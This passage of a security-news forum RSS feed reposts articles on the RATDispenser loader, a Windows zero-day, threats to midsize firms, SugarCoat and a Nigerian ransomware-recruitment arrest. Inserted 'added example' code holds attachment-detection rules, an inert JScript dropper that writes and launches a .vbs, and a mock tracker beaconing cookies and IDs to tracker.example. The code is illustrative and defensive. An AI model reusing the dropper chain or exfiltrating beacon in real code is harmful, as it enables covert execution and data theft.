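// in front of it, and whitespace padding that pushes the real extension out
// of view in a mail client.
function filenameIndicators(filename) {
  const parts = filename.toLowerCase().split('.').map((p) => p.trim());
  const found = [];
  if (parts.length < 2 || !SCRIPT_EXT.has(parts[parts.length - 1])) return found;
  found.push({ name: 'script-extension', weight: 2 });
  if (parts.length >= 3 && DECOY_EXT.has(parts[parts.length - 2])) {
    found.push({ name: 'decoy-double-extension', weight: 4 });
  }
  if (/\s{2,}/.test(filename)) found.push({ name: 'padded-filename', weight: 2 });
  return found;
}

function scoreAttachment(filename, source) {
  const hits = filenameIndicators(filename);
  for (const ind of INDICATORS) {
    if (ind.re.test(source)) hits.push({ name: ind.name, weight: ind.weight });
  }
  const indicators = hits.map((h) => h.name);
  const score = hits.reduce((sum, h) => sum + h.weight, 0);
  // COM instantiation combined with a file write or a process launch is the
  // dropper chain itself, so it is quarantined regardless of the total score.
  const dropperChain = indicators.includes('activex-object') &&
    (indicators.includes('writes-vbs') || indicators.includes('spawns-process'));
  let verdict = 'allow';
  if (dropperChain || score >= 8) verdict = 'quarantine';
  else if (score >= 4) verdict = 'review';
  return { score, indicators, verdict };
}

// Constructed, inert sample modelled on the chain described above: JScript that
// writes a .vbs to %TEMP% and launches it. The VBScript it would write is
// MsgBox "hi" (spelled out via fromCharCode, as obfuscated droppers do).
const SAMPLE_DROPPER = [
  'var fso = new ActiveXObject("Scripting.FileSystemObject");',
  'var sh = new ActiveXObject("WScript.Shell");',
  'var p = sh.ExpandEnvironmentStrings("%TEMP%") + "\\\\stage2.vbs";',
  'var f = fso.CreateTextFile(p, true);',
  'f.WriteLine(String.fromCharCode(77,115,103,66,111,120,32,34,104,105,34));',
  'f.Close();',
  'sh.Run("wscript.exe " + p, 0, false);',
].join('\n');

// Constructed benign script for comparison.
const SAMPLE_BENIGN = [
  'function total(items) {',
  '  return items.reduce(function (sum, it) { return sum + it.price * it.qty; }, 0);',
  '}',
].join('\n');

console.log(scoreAttachment('Invoice_2021-11.txt.js', SAMPLE_DROPPER));
console.log(scoreAttachment('cart.js', SAMPLE_BENIGN));
```

<p>
	The point of the combined rule is that heavily obfuscated samples may hide most string indicators, but a dropper still has to instantiate a COM object and then write or launch something, and that pairing is what the verdict keys on; the score only ranks the rest for analyst review.
</p>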

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="AVvXsEiVpZjP-U4V23a3iVGVZLe8_Wzh3d-oruuO" class="ipsImage" data-ratio="50.56" height="360" width="720" src="https://thehackernews.com/new-images/img/a/AVvXsEiVpZjP-U4V23a3iVGVZLe8_Wzh3d-oruuOnA2ZfDcGsK_vCKgCftK0lqK-LtiLbLAMLlpmfSaSt75rHJMfd-68ER-bcsikw5pvoMNCoBYU7Onlj2MXaCh2XdXRfN4_b-cnFGpayieZ7YjZVxCgKWnEln-nOC_fIeRxgORWN0Uno75MEtqPmi1P9TVd=s728-e1000" />
</p>

<p style="text-align:center;">
	 
</p>

<p>
	RATDispenser has been observed dropping several kinds of malware, including STRRAT, WSHRAT (aka Houdini or Hworm), AdWind (aka AlienSpy or Sockrat), Formbook (aka xLoader), Remcos (aka Socmer), Panda Stealer, CloudEyE (aka GuLoader), and Ratty, each of which is equipped to siphon sensitive data from compromised devices, in addition to targeting cryptocurrency wallets.
</p>

<p>
	 
</p>

<p>
	"The variety in malware families, many of which can be purchased or downloaded freely from underground marketplaces, and the preference of malware operators to drop their payloads, suggest that the authors of RATDispenser may be operating under a malware-as-a-service business model," Schläpfer said.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2021/11/this-new-stealthy-javascript-loader.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">3485</guid><pubDate>Thu, 25 Nov 2021 14:06:44 +0000</pubDate></item><item><title>All Versions of Windows Are Vulnerable to a New Zero-Day Exploit</title><link>https://nsaneforums.com/news/security-privacy-news/all-versions-of-windows-are-vulnerable-to-a-new-zero-day-exploit-r3477/</link><description><![CDATA[<p>
	<span style="font-size:22px;">Malware writers are already trying to take advantage of this privilege escalation vulnerability.</span>
</p>

<p>
	 
</p>

<p>
	A new Windows zero-day vulnerability affects all versions of Windows, including fully patched Windows 11 and Windows Server 2022 installations.
</p>

<p>
	 
</p>

<p>
	Jaeson Schultz, Technical Leader at the Talos Security Intelligence &amp; Research Group, shared details of the vulnerability, which stems from a previous Windows Installer bug that Microsoft thought it had patched earlier this month (CVE-2021-41379). The original vulnerability allowed a user with a limited account to escalate their privileges and delete targeted files on a system. This new vulnerability looks to be more serious, though.
</p>

<p>
	 
</p>

<p>
	Security researcher Abdelhamid Naceri, whom Microsoft credited in the notes for the CVE-2021-41379 patch, analyzed the fix and found that "the bug was not fixed correctly." Naceri posted details on GitHub and explained that this variant is more powerful than the original because it completely bypasses the group policy included in the administrative install feature of Windows. The knock-on effect is that an attacker can replace any executable file on the system with an MSI file and run code as an administrator.
</p>

<p>
	 
</p>

<p>
	Right now there is no patch for this vulnerability, and malware samples that attempt to exploit it have already been discovered in the wild, so wider abuse is likely to follow soon. Naceri believes the only option for users is to wait for Microsoft to release another security patch, given the complexity of the vulnerability and because "any attempt to patch the binary directly will break windows installer."
</p>

<p>
	 
</p>

<p>
	As ever, Windows users should be running a security suite and keeping all their software applications updated as a precaution against any malicious activity. Hopefully the coverage this zero-day exploit is receiving encourages Microsoft to create and release a security patch quickly.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.pcmag.com/news/all-versions-of-windows-are-vulnerable-to-a-new-zero-day-exploit" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">3477</guid><pubDate>Wed, 24 Nov 2021 14:23:53 +0000</pubDate></item><item><title>Midsize Companies Face a Hacking Epidemic in 2022</title><link>https://nsaneforums.com/news/security-privacy-news/midsize-companies-face-a-hacking-epidemic-in-2022-r3462/</link><description><![CDATA[<p>
	<strong>Cyberattacks against mid-market companies are growing at an unprecedented rate—but most such businesses are completely unprepared.</strong>
</p>

<p>
	 
</p>

<p>
	A midsize or mid-market business is generally defined as a company employing 1,000 to 2,000 employees with annual revenues between $10 million and $1 billion. There are more than 200,000 such businesses in the US, and they account for around one-third of our annual gross domestic product (GDP), according to Dun &amp; Bradstreet’s database of commercially active US firms. That's a healthy portion of our economy, and yet most of these firms seem to have what amounts to digital tissue paper between themselves and a cyber attack.
</p>

<p>
	 
</p>

<p>
	Security technology provider Coro just completed a study of security preparedness in the mid-market space, and the numbers are truly disturbing. According to Coro's research, midsize businesses were targeted at least 50% more in 2021 than in 2020. Some sectors, notably healthcare and transportation, experienced up to 125% more attacks in that span, and others, including retail and manufacturing, saw increases up to 90%.
</p>

<p>
	 
</p>

<p>
	The volume of attacks isn't the only thing on the rise. What's really scary is that the sophistication of hacking attempts and the overall attack surfaces have gone up, too. Coro's research shows that compared to 2020, the kinds of attacks being leveled at smaller businesses have spanned the gamut of cyber sliminess, including traditional endpoint malware but also Wi-Fi phishing, insider threats, and especially, ransomware.
</p>

<p>
	 
</p>

<p>
	Coro says that a big reason smaller companies were targeted more in 2021 is the new normal of hybrid work. This trend has many mid-market companies relying almost entirely on third-party cloud services for productivity software while managing a nearly 100% remote workforce that also uses a large number of unmanaged devices. In other words, your software and data are out on the wild and woolly web, while your endpoints are, well, just about anywhere.
</p>

<p>
	 
</p>

<p>
	Add to that the scarcity of competent IT security specialists, and it's easy to see why many mid-market companies are adopting the hermit-crab approach to cybersecurity: Keep your head down, and hope the threats just pass you by. This isn't entirely unreasonable, since there are so many more small businesses than enterprises operating today. What are the odds the bad guys will single out your little firm? Well, starting this year, the odds have gotten better, and the attacks have become a lot smarter.
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="00Ck7ETOCAemupEq2jfgK0y-2.fit_lim.size_8" class="ipsImage" data-ratio="65.83" height="404" width="720" src="https://i.pcmag.com/imagery/articles/00Ck7ETOCAemupEq2jfgK0y-2.fit_lim.size_845x.jpg" />
</p>

<p style="text-align:center;">
	<span style="font-size:12px;"><em>(Chart: courtesy of Coro)</em></span>
</p>

<p style="text-align:center;">
	 
</p>

<p>
	And because most midsize companies lack a security specialist, many aren't even aware of the new threats that face them. For example, Coro's numbers show that the volume and types of email attacks have risen 154% between 2020 and 2021, yet only 1% of midsize companies have actual email protection in place. And of those, 88% have their security settings misconfigured according to current best practices. The more sophisticated or uncommon an attack type is, the worse these numbers become.
</p>

<p>
	 
</p>

<p>
	A good example is Wi-Fi phishing. This is when the bad guys set up a Wi-Fi router or access point that looks like a legitimate entry point to your company network. Employees connect to the device, and cybercriminals then have access to every packet of data going through it. Most smaller companies don't consider this kind of attack, because it usually involves some on-site criminal presence, either someone outside with a wireless device or even someone who has snuck into the office and planted a fake access point that looks just like a real one.
</p>
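<p>
	As an added example (not Coro's product or research code), the triage below does what a small company's own wireless monitoring could do against the evil twin just described: compare what a scan sees against an inventory of sanctioned access points and flag anything that broadcasts the corporate SSID, or a lookalike of it, from an unknown BSSID or with a different security mode than the real network uses. The inventory, the SSID, the BSSIDs and the scan records are all constructed for the demo.
</p>

```javascript
// Added example: evil-twin triage from a Wi-Fi scan. The sanctioned inventory
// and the scan records below are constructed for the demo.
const SANCTIONED = {
  ssid: 'AcmeCorp',
  security: 'WPA2-Enterprise',
  bssids: new Set(['a4:56:30:11:22:01', 'a4:56:30:11:22:02', 'a4:56:30:11:22:03']),
};

// Cyrillic letters that render identically to Latin ones in most fonts.
const CONFUSABLES = { '\u0430': 'a', '\u0435': 'e', '\u043e': 'o', '\u0440': 'p',
                      '\u0441': 'c', '\u0445': 'x', '\u0443': 'y' };

// Reduce an SSID to a comparison key: fold case and width, swap confusable
// letters and digit-for-letter tricks, drop spacing and punctuation.
function normalizeSsid(ssid) {
  return ssid.normalize('NFKC').toLowerCase()
    .replace(/[\u0430\u0435\u043e\u0440\u0441\u0445\u0443]/g, (ch) => CONFUSABLES[ch])
    .replace(/0/g, 'o').replace(/1/g, 'l')
    .replace(/[^a-z]/g, '');
}

function classifyAccessPoint(ap, sanctioned = SANCTIONED) {
  const findings = [];
  const exactSsid = ap.ssid === sanctioned.ssid;
  const lookalike = !exactSsid && normalizeSsid(ap.ssid) === normalizeSsid(sanctioned.ssid);
  if (!exactSsid && !lookalike) return { ...ap, verdict: 'unrelated', findings };
  if (lookalike) findings.push('lookalike-ssid');
  // An unknown radio using our name is the classic evil twin. A twin that also
  // clones one of our BSSIDs and our security mode is only visible from the
  // air (channel, signal, timing), so this check is necessary, not sufficient.
  if (!sanctioned.bssids.has(ap.bssid.toLowerCase())) findings.push('unknown-bssid');
  // Our name, or even our BSSID, but not our authentication: an open twin
  // fronting a captive portal, or a PSK twin, harvesting credentials or traffic.
  if (ap.security !== sanctioned.security) findings.push('security-mismatch:' + ap.security);
  return { ...ap, verdict: findings.length ? 'rogue' : 'sanctioned', findings };
}

function triageScan(scan, sanctioned = SANCTIONED) {
  return scan.map((ap) => classifyAccessPoint(ap, sanctioned)).filter((r) => r.verdict === 'rogue');
}

// Constructed scan results (what a monitoring client might report).
const SCAN = [
  { ssid: 'AcmeCorp',   bssid: 'A4:56:30:11:22:01', channel: 36, security: 'WPA2-Enterprise', signal: -48 },
  { ssid: 'AcmeCorp',   bssid: 'A4:56:30:11:22:02', channel: 44, security: 'WPA2-Enterprise', signal: -61 },
  { ssid: 'AcmeCorp',   bssid: '02:11:22:33:44:55', channel: 6,  security: 'OPEN',            signal: -35 },
  { ssid: 'AcmeC0rp',   bssid: '02:11:22:33:44:56', channel: 11, security: 'WPA2-PSK',        signal: -40 },
  { ssid: 'AcmeCorp',   bssid: 'A4:56:30:11:22:03', channel: 1,  security: 'WPA2-PSK',        signal: -39 },
  { ssid: 'CoffeeShop', bssid: '10:20:30:40:50:60', channel: 1,  security: 'OPEN',            signal: -70 },
];

for (const r of triageScan(SCAN)) console.log(r.bssid, r.ssid, r.findings.join(', '));
```

<p>
	The third and fourth scan entries are the textbook twin (an open network with the corporate name, and a digit-for-letter lookalike); the fifth shows why the security mode is checked even for a known BSSID, since a BSSID is trivially spoofed. Clients that are configured to validate the RADIUS server certificate will refuse the first two twins on their own; the inventory check catches the ones users would otherwise click through.
</p>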

<p>
	 
</p>

<p>
	This is where the hermit-crab mentality can hurt you. Most smaller companies don't consider themselves large enough to warrant such in-person attacks, so they don't protect themselves effectively. Regarding Wi-Fi phishing, Coro says these attacks have increased by a jaw-dropping 203% against mid-market companies with, again, only 1% having any kind of protection in place and a misconfiguration rate within that 1% of around 90%.
</p>

<p>
	 
</p>

<p>
	Midsize companies need to accept that the most insidious digital danger facing them in 2022 is that the bad guys actually know who they are.
</p>

<p>
	 
</p>

<p>
	Coro terms non-targeted attacks "naive," and its research shows these attacks have dropped from 86% against smaller companies in 2020 down to 68% in 2021. Meanwhile, targeted attacks within that same period have grown between 2 and 4 times. Even more granular than incursions against a specific company are attacks that target a specific role or even a certain person. Against companies without adequate identity management, these attacks have risen from 12% in 2020 to 26% in 2021.
</p>

<p>
	 
</p>

<p>
	Bottom line: In only one year, the criminals that smaller companies are defending themselves against haven't just gotten smarter—they're now looking at you in particular. Watch your back.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.pcmag.com/news/midsize-companies-face-a-hacking-epidemic-in-2022" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">3462</guid><pubDate>Tue, 23 Nov 2021 15:59:21 +0000</pubDate></item><item><title>This Tool Protects Your Private Data While You Browse</title><link>https://nsaneforums.com/news/security-privacy-news/this-tool-protects-your-private-data-while-you-browse-r3460/</link><description><![CDATA[<p>
	A team of computer scientists at the University of California San Diego and Brave Software have developed a tool that will increase protections for users’ private data while they browse the web.
</p>

<p>
	 
</p>

<p>
	The tool, named SugarCoat, targets scripts that harm users’ privacy—for example, by tracking their browsing history around the Web—yet are essential for the websites that embed them to function. SugarCoat replaces these scripts with scripts that have the same properties, minus the privacy-harming features. SugarCoat is designed to be integrated into existing privacy-focused browsers like Brave, Firefox, and Tor, and browser extensions like uBlock Origin. SugarCoat is open source and is currently being integrated into the Brave browser.
</p>

<p>
	 
</p>

<p>
	"SugarCoat is a practical system designed to address the lose-lose dilemma that privacy-focused tools face today: Block privacy-harming scripts, but break websites that rely on them; or keep sites working, but give up on privacy," said Deian Stefan, an assistant professor in the UC San Diego Department of Computer Science and Engineering. "SugarCoat eliminates this trade-off by allowing the scripts to run, thus preserving compatibility, while preventing the scripts from accessing user-private data."
</p>

<p>
	 
</p>

<p>
	The researchers are describing their work at the ACM Conference on Computer and Communications Security (CCS) taking place in Seoul, Korea, Nov. 14 to 19, 2021.
</p>

<p>
	 
</p>

<p>
	"SugarCoat integrates with existing content-blocking tools, like ad blockers, to empower users to browse the Web without giving up their privacy," said Michael Smith, a PhD student in Stefan’s research group, who is leading the project.
</p>

<p>
	 
</p>

<p>
	Most existing content-blocking tools make very coarse-grained decisions: They either totally block or totally allow a script to run, based on whether it appears on a public list of privacy-harming scripts.  In practice, though, some scripts are both privacy-harming and necessary for websites to function—and most tools inevitably choose to make an exception and allow these scripts to run. Today, there are more than 6,000 exception rules letting through these privacy-harming scripts.
</p>

<p>
	 
</p>

<p>
	There is a better approach, though. Instead of blocking a script entirely or allowing it to run, content-blocking tools can replace its source code with an alternative privacy-preserving version. For example, instead of loading popular website analytics scripts which also track users, content-blocking tools replace these scripts with fake versions that look the same. This ensures that the content-blocking tools are not breaking web pages that embed these scripts and that the scripts can’t access private data (and thus report it back to the analytics companies). To date, crafting such privacy-preserving replacement scripts has been a slow, manual task even for privacy engineering experts. uBlock Origin, for example, maintains replacements for only 27 scripts, compared to the over 6,000 exception rules.
</p>

<p>
	 
</p>

<p>
	<strong>How SugarCoat changes the game</strong>
</p>

<p>
	The researchers developed SugarCoat precisely to address this gap by automatically generating privacy-preserving replacement scripts. The tool uses the PageGraph tracing framework (Smith was key to its development) to follow the behavior of privacy-harming scripts throughout the browser engine.
</p>

<p>
	 
</p>

<p>
	SugarCoat scans this data to identify when and how the scripts talk to Web Platform APIs that expose privacy-sensitive data. SugarCoat then rewrites the scripts’ source code to talk to fake “SugarCoated” APIs instead, which look like the Web Platform APIs but don’t actually expose any private data.
</p>
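<p>
	The snippet below is an added illustration of that rewrite step, not SugarCoat's code: a constructed tracker script is rewritten so that its references to navigator, screen, document, localStorage and fetch resolve through a namespace object, and the same rewritten script is then run twice, once bound to stand-ins for the real browser APIs and once to SugarCoated replacements of the same shape that return synthetic values. The tracker, the API stand-ins and the regex rewrite are simplifications for the demo; SugarCoat decides what to rewrite from PageGraph traces and ships reviewed replacement scripts.
</p>

```javascript
// Added example: a SugarCoat-style API replacement in miniature. The tracker
// script, the "real" API stand-ins and the regex rewrite are constructed for
// the demo; SugarCoat derives its rewrites from PageGraph traces instead.

// Constructed tracker: fingerprints the user, beacons it home, and exposes
// analytics.track(), which the embedding page relies on.
const TRACKER_SRC = `
  var fp = [navigator.userAgent, screen.width + 'x' + screen.height,
            document.cookie, localStorage.getItem('uid')].join('|');
  fetch('https://tracker.example/collect?fp=' + encodeURIComponent(fp));
  window.analytics = {
    track: function (event) {
      fetch('https://tracker.example/event?e=' + event + '&fp=' + encodeURIComponent(fp));
      return true;
    }
  };
`;

// Stand-ins for what the browser would hand the script (constructed values).
const REAL_APIS = {
  navigator: { userAgent: 'Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0' },
  screen: { width: 1920, height: 1080 },
  document: { cookie: 'session=4f3c9a; uid=u-12345' },
  localStorage: { getItem: (key) => (key === 'uid' ? 'u-12345' : null) },
};

// SugarCoated replacements: same shape, same types, no user data. Storage is
// a private in-memory map so the script still "works" across its own calls.
function sugarcoatedApis() {
  const store = new Map();
  return {
    navigator: { userAgent: 'Mozilla/5.0' },
    screen: { width: 0, height: 0 },
    document: { cookie: '' },
    localStorage: {
      getItem: (key) => (store.has(key) ? store.get(key) : null),
      setItem: (key, value) => { store.set(key, String(value)); },
    },
  };
}

const PRIVATE_GLOBALS = ['navigator', 'screen', 'document', 'localStorage', 'fetch', 'window'];

// The rewrite: every free reference to a sensitive global becomes __sc.<name>,
// so the script is unchanged except for where those names resolve.
// Property accesses such as obj.document are left alone.
function sugarcoat(src) {
  const re = new RegExp('(^|[^.\\w$])(' + PRIVATE_GLOBALS.join('|') + ')\\b', 'gm');
  return src.replace(re, '$1__sc.$2');
}

// Run the rewritten script against a given API set; record outgoing requests
// instead of sending them, and capture what it attaches to window.
function runTracker(src, apis) {
  const requests = [];
  const sc = {
    ...apis,
    window: {},
    fetch: (url) => { requests.push(url); return Promise.resolve({ ok: true }); },
  };
  new Function('__sc', sugarcoat(src))(sc);
  return { requests, window: sc.window };
}

function leaksSecret(requests, secret) {
  return requests.some((url) => decodeURIComponent(url).includes(secret));
}

const real = runTracker(TRACKER_SRC, REAL_APIS);
const safe = runTracker(TRACKER_SRC, sugarcoatedApis());
safe.window.analytics.track('purchase');   // page functionality still works
console.log('real :', real.requests[0]);
console.log('safe :', safe.requests.join('\n       '));
console.log('leaks uid? real=%s safe=%s', leaksSecret(real.requests, 'u-12345'), leaksSecret(safe.requests, 'u-12345'));
```

<p>
	The contrast is the whole point: the tracker runs to completion in both cases and the page's call to analytics.track() still works, but in the SugarCoated run the beacon carries a generic user agent, a zero-size screen, an empty cookie and a null identifier, so nothing worth correlating ever leaves the browser.
</p>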

<p>
	 
</p>

<p>
	To evaluate the impact of SugarCoat on Web functionality and performance, the team integrated the rewritten scripts into the Brave browser; they found that SugarCoat effectively protected users’ private data without impacting functionality or page load performance. SugarCoat is now being deployed in production at Brave.
</p>

<p>
	 
</p>

<p>
	“Brave is excited to start deploying the results of the year-long SugarCoat research project,” said Peter Snyder, senior privacy researcher and director of privacy at Brave Software. “SugarCoat gives Brave and other privacy projects a powerful, new capability for defeating online trackers, and helps keep users in control of the Web."
</p>

<p>
	 
</p>

<p>
	This work was supported by the NSF under grant numbers CCF-1918573 and CAREER CNS-2048262, by a gift from Brave Software, and by an NSF Graduate Research Fellowship. 
</p>

<p>
	 
</p>

<p>
	<strong>SugarCoat: Programmatically Generating Privacy-Preserving, Web-Compatible Resource Replacements for Content Blocking</strong>
</p>

<p>
	Michael Smith and Deian Stefan, University of California San Diego
</p>

<p>
	 
</p>

<p>
	Benjamin Livshits, Imperial College of London
</p>

<p>
	 
</p>

<p>
	Peter Snyder, Brave Software
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://ucsdnews.ucsd.edu/pressrelease/SugarCoat" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">3460</guid><pubDate>Tue, 23 Nov 2021 15:47:13 +0000</pubDate></item><item><title>Arrest in &#x2018;Ransom Your Employer&#x2019; Email Scheme</title><link>https://nsaneforums.com/news/security-privacy-news/arrest-in-%E2%80%98ransom-your-employer%E2%80%99-email-scheme-r3457/</link><description><![CDATA[<p>
	In August, KrebsOnSecurity warned that scammers were contacting people and asking them to unleash ransomware inside their employer’s network, in exchange for a percentage of any ransom amount paid by the victim company. This week, authorities in Nigeria arrested a suspect in connection with the scheme — a young man who said he was trying to save up money to help fund a new social network.
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="madalin.png" class="ipsImage" data-ratio="39.97" height="263" width="658" src="https://krebsonsecurity.com/wp-content/uploads/2021/08/madalin.png" />
</p>

<p style="text-align:center;">
	 
</p>

<p>
	The brazen approach targeting disgruntled employees was first spotted by threat intelligence firm<strong> Abnormal Security</strong>, which described what happened after they adopted a fake persona and responded to the proposal in the screenshot above.
</p>

<p>
	 
</p>

<p>
	“According to this actor, he had originally intended to send his targets—all senior-level executives—phishing emails to compromise their accounts, but after that was unsuccessful, he pivoted to this ransomware pretext,” Abnormal’s <strong>Crane Hassold</strong> wrote.
</p>

<p>
	 
</p>

<p>
	Abnormal Security documented how it tied the email back to a Nigerian man who acknowledged he was trying to save up money to help fund a new social network he is building called <strong>Sociogram</strong>. In June 2021, the Nigerian government officially placed an indefinite ban on Twitter, restricting it from operating in Nigeria after the social media platform deleted tweets by the Nigerian president.
</p>

<p>
	 
</p>

<p>
	Reached via LinkedIn, Sociogram founder Oluwaseun Medayedupin asked to have his startup’s name removed from the story, although he did not respond to questions about whether there were any inaccuracies in Hassold’s report.
</p>

<p>
	 
</p>

<p>
	“Please don’t harm Sociogram’s reputation,” Medayedupin pleaded. “I beg you as a promising young man.”
</p>

<p>
	 
</p>

<p>
	After he deleted his LinkedIn profile, I received the following message through the “contact this domain holder” link at KrebsOnSecurity’s domain registrar [curiously, the date of that missive reads “Dec. 31, 1969.”]. Apparently, Mr. Krebson is a clout-chasing monger.
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="sociogramgram.png" class="ipsImage" data-ratio="69.44" height="461" width="720" src="https://krebsonsecurity.com/wp-content/uploads/2021/11/sociogramgram.png" />
</p>

<p style="text-align:center;">
	 
</p>

<p style="text-align:center;">
	<span style="font-size:12px;"><em>A love letter from the founder of the ill-fated Sociogram.</em></span>
</p>

<p style="text-align:center;">
	 
</p>

<p>
	 
</p>

<p>
	Mr. Krebson also heard from an investigator representing the Nigeria Finance CERT on behalf of the Central Bank Of Nigeria. While the Sociogram founder’s approach might seem amateurish to some, the financial community in Nigeria did not consider it a laughing matter.
</p>

<p>
	 
</p>

<p>
	On Friday, Nigerian police arrested Medayedupin. The investigator says formal charges will be levied against the defendant sometime this week.
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="nigfincert.png" class="ipsImage" data-ratio="105.26" height="540" width="360" src="https://krebsonsecurity.com/wp-content/uploads/2021/11/nigfincert.png" /> 
</p>

<p style="text-align:center;">
	<span style="font-size:12px;"><em>The petition for arrest.</em></span>
</p>

<p style="text-align:center;">
	 
</p>

<p style="text-align:center;">
	 <img alt="medayepupin.png" class="ipsImage" data-ratio="95.91" height="540" width="443" src="https://krebsonsecurity.com/wp-content/uploads/2021/11/medayepupin.png" />  
</p>

<p style="text-align:center;">
	<span style="font-size:12px;"><em>Medayedupin being booked.</em></span>
</p>

<p style="text-align:center;">
	 
</p>

<p style="text-align:center;">
	<img alt="mdell-768x607.png" class="ipsImage" data-ratio="75.10" height="540" width="683" src="https://krebsonsecurity.com/wp-content/uploads/2021/11/mdell-768x607.png" />
</p>

<p style="text-align:center;">
	<span style="font-size:12px;"><em>Seized laptop.</em></span>
</p>

<p style="text-align:center;">
	 
</p>

<p>
	KrebsOnSecurity spoke with a fraud investigator who is performing the forensic analysis of the devices seized from Medayedupin’s home. The investigator spoke on condition of anonymity out of concern for his physical safety.
</p>

<p>
	 
</p>

<p>
	The investigator — we’ll call him “George” — said the 23-year-old Medayedupin lives with his extended family in an extremely impoverished home, and that the young man told investigators he’d just graduated from college but turned to cybercrime at first with ambitions of merely scamming the scammers.
</p>

<p>
	 
</p>

<p>
	George’s team confirmed that Medayedupin had around USD $2,000 to his name, which he’d recently stolen from a group of Nigerian fraudsters who were scamming people for gift cards. Apparently, he admitted to creating a phishing website that tricked a member of this group into providing access to the money they’d made from their scams.
</p>

<p>
	 
</p>

<p>
	Medayedupin reportedly told investigators that for almost a week after he started emailing his ransom-your-employer scheme, nobody took him up on the offer. But after his name appeared in the news media, he received thousands of inquiries from people interested in his idea.
</p>

<p>
	 
</p>

<p>
	George described Medayedupin as smart, a quick learner, and fairly dedicated to his work.
</p>

<p>
	 
</p>

<p>
	“He seems like he could be a fantastic [employee] for a company,” George said. “But there is no employment here, so he chose to do this.”
</p>

<p>
	 
</p>

<p>
	What’s interesting about this case — and indeed likely why anyone thought this guy worthy of arrest — is that the Nigerian authorities were fairly swift to take action when a domestic cybercriminal raised the specter of causing financial losses for its own banks.
</p>

<p>
	 
</p>

<p>
	After all, the majority of the cybercrime that originates from Africa — think romance scams, Business Email Compromise (BEC) fraud, and unemployment/pandemic loan fraud — does not target Nigerian citizens, nor does it harm African banks. On the contrary: This activity pumps a great deal of Western money into Nigeria.
</p>

<p>
	 
</p>

<p>
	How much money are we talking about? The financial losses from these scams dwarf other fraud categories — such as identity theft or credit card fraud. According to the FBI’s Internet Crime Complaint Center (IC3), consumers and businesses reported more than $4.2 billion in losses tied to cybercrime in 2020, and BEC fraud and romance scams alone accounted for nearly 60 percent of those losses.
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="fbi-ic3-losses2020.png" class="ipsImage" data-ratio="65.88" height="446" width="677" src="https://krebsonsecurity.com/wp-content/uploads/2021/11/fbi-ic3-losses2020.png" />
</p>

<p style="text-align:center;">
	<span style="font-size:12px;"><em>Source: FBI/IC3 2020 Internet Crime Report.</em></span>
</p>

<p style="text-align:center;">
	 
</p>

<p>
	If the influx of a few billion US dollars into the Nigerian economy each year from cybercrime seems somehow insignificant, consider that (according to George) the average police officer in the country makes the equivalent of less than USD $100 a month.
</p>

<p>
	 
</p>

<p>
	<strong>Ronnie Tokazowski</strong> is a threat researcher at <strong>Agari</strong>, a security firm that has closely tracked many of the groups behind BEC scams. Tokazowski maintains he has been one of the more vocal proponents of the idea that trying to fight these problems by arresting those involved is something of a Sisyphean task, and that it makes way more sense to focus on changing the economic realities in places like Nigeria.
</p>

<p>
	 
</p>

<p>
	Nigeria has the world’s second-highest unemployment rate — rising from 27.1 percent in 2019 to 33 percent in 2020, according to the <strong>National Bureau of Statistics</strong>. The nation also is among the world’s most corrupt, according to 2020 findings from <strong>Transparency International.</strong>
</p>

<p>
	 
</p>

<p>
	“Education is definitely one piece, as raising awareness is hands down the best way to get ahead of this,” Tokazowski said, in a June 2021 interview. “But we also need to think about ways to create more business opportunities there so that people who are doing this to put food on the table have more legitimate opportunities. Unfortunately, thanks to the level of corruption of government officials, there are a lot of cultural reasons that fighting this type of crime at the source is going to be difficult.”
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://krebsonsecurity.com/2021/11/arrest-in-ransom-your-employer-email-scheme/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">3457</guid><pubDate>Tue, 23 Nov 2021 14:17:56 +0000</pubDate></item></channel></rss>
